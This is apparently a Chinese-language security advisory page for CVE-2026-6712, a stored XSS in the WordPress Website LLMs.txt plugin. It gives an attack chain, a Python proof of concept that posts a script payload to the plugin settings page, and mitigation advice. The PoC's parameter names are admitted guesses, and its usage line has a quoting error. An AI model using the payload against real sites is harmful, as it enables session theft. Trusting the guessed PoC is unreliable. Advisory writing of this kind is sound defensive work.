CVE-2026-6712 CVSS 4.4 中危

CVE-2026-6712 WordPress插件存储型XSS漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6712

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Website LLMs.txt 插件

漏洞概述

WordPress Website LLMs.txt 插件在 8.2.6 及以下版本中存在存储型跨站脚本漏洞。由于插件管理员设置页面缺乏足够的输入清理和输出转义，拥有管理员及以上权限的认证攻击者可注入恶意脚本。该漏洞主要影响多站点安装或禁用了 unfiltered_html 权限的环境，受害者访问被注入页面时将触发脚本执行。

技术细节

该漏洞的根源在于插件对管理员设置中的用户输入数据未进行严格的过滤和转义。在常规 WordPress 单站点环境中，管理员通常拥有 unfiltered_html 权限，但这在多站点网络中默认是禁用的，或者被管理员手动禁用，此时该漏洞具有可利用性。攻击者利用管理员权限登录后台，导航至插件设置页面，并在特定字段中注入恶意 JavaScript 代码（如 <script> 标签）。系统将此恶意代码保存至数据库。当其他用户（如其他管理员）访问渲染该设置的页面时，未经过滤的代码将被浏览器解析执行，进而导致 Cookie 窃取或恶意操作。

攻击链分析

STEP 1

侦察

攻击者识别目标站点使用 WordPress 并安装了 Website LLMs.txt 插件，且版本低于或等于 8.2.6。

STEP 2

获取权限

攻击者通过社会工程学或其他漏洞获取该 WordPress 站点的管理员级别账户凭证。

STEP 3

注入 Payload

攻击者登录后台，访问插件设置页面，在输入框中注入恶意 JavaScript 代码并保存。

STEP 4

触发执行

当其他管理员或用户访问包含该设置的页面时，恶意脚本在浏览器端执行，窃取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-6712 (Stored XSS in Website LLMs.txt)
# Usage: python3 poc.py <target_url> <admin_cookie>

import requests
import sys

def exploit(target, cookie):
    # The vulnerable endpoint is typically the plugin settings page
    url = f"{target}/wp-admin/admin.php?page=website-llms-txt-settings"
    
    headers = {
        "Cookie": cookie,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (PoC Scanner)"
    }
    
    # Malicious payload to be stored and executed
    # Note: Actual parameter names depend on the plugin implementation
    payload = '"><script>alert(document.cookie);</script>'
    
    data = {
        "llms_txt_content": payload,  # Example parameter name
        "action": "save_settings",
        "submit": "Save Changes"
    }
    
    try:
        response = requests.post(url, headers=headers, data=data)
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check the target page.")
        else:
            print(f"[-] Failed to send payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python3 poc.py http://target.com "wordpress_logged_in_...")
    else:
        exploit(sys.argv[1], sys.argv[2])

影响范围

Website LLMs.txt <= 8.2.6

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用该插件以消除攻击面。同时，应加强对管理员账户的安全防护（如启用多因素认证），防止攻击者获取高权限账户进行利用。对于多站点安装，应定期审查已安装的插件列表和版本状态。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表